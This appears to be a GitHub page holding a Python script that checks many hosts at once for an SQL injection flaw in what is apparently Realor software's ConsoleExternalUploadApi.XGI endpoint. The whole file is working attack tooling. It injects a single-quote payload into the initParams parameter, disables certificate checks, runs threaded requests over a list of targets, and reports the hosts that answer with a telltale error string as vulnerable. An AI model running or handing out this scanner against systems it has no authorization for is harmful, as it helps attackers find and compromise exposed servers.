-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathrealor-sql-Injection-check.py
88 lines (80 loc) · 3.83 KB
/
realor-sql-Injection-check.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# 自定义请求头字段
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"
}
vulurl=[]
#url合规检测执行
def urltest(url):
parsed_url = urlsplit(url)
if parsed_url.port == "443" and parsed_url.netloc:
url="https://"+parsed_url.netloc+"/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182"
vultest(url)
if parsed_url.netloc and parsed_url.path:
url=parsed_url.scheme+"://"+parsed_url.netloc+"/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182"
vultest(url)
elif parsed_url.netloc:
url=url+"/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182"
vultest(url)
elif (not parsed_url.scheme) and parsed_url.path:
url_1="http://"+url+"/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182"
vultest(url_1)
url_2="https://"+url+"/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182"
vultest(url_2)
else:
modified_string = re.sub(r"[/\\].*", "/ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182", url)
url_1="http://"+modified_string
vultest(url_1)
url_2="https://"+modified_string
vultest(url_2)
#漏洞检测
def vultest(url):
try:
response = requests.get(url, headers=headers, verify=False , timeout=3)
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
# 检查存在漏洞的情况
if "未查询到符合条件的用户" in response.text:
vulurl.append(url)
print(url+" [+]漏洞存在!!!")
else:
print(url+" [-]漏洞不存在。")
except RequestException:
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
print(url+" [-]请求失败。")
#读取url或file
def main():
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description="读取命令行参数")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u', '--url', help='URL 参数')
group.add_argument('-f', '--file', help='file 参数')
args = parser.parse_args()
if args.url:
urltest(args.url)
elif args.file:
threads_queue=[]
with open(args.file, 'r') as file:
for line in file:
line=line.strip()
read_thread = threading.Thread(target=urltest, args=(line,))
threads_queue.append(read_thread)
read_thread.start()
for thread in threads_queue:
thread.join()
print("\n存在漏洞列表:")
for url in vulurl:
print(url+" [+]漏洞存在!!!")
if __name__ == "__main__":
main()